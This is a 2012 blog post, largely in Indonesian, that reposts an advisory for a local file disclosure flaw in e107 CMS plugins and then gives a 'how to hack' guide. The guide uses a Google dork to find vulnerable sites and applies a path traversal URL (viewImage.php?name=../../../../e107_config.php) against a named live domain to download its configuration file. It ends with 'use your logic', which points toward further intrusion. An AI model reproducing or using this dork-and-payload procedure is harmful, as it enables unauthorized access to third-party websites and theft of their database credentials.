Thursday, July 12, 2012

e107 plugin local file Disclosure

4:45 AM gilang No comments 


##################################################
# Description : e107 Plugins - FilleDownload Plugin local file Disclosure
# Version : 1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=20&id=14
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.14
# Date : 18-06-2012
# Google Dork : inurl:/e107_plugins/filedownload
                inurl:/e107_plugins/image_gallery/



# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################



how to hack




pergi ke google tulis : inurl:/e107_plugins/image_gallery/






dapat salah 1 web vuln seperti ini : 




http://zers-leds.ru/e107_plugins/image_gallery/image_gallery.php





jika vuln kita akan dapat men download file config nya




so lets exploit




http://zers-leds.ru/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album




gotcha kita siap mendownload config dari web e107 ini dah selanjut nya use you logic 




post by gilang owners 666











                                  Posted in:  
                                  






































0
comments
                                :
                              













Post a Comment



































                   
                

























        Design by 
        
          blogger templates
        
        | powered by 
        
          cbfteam official
        
        | 
        
          zone-h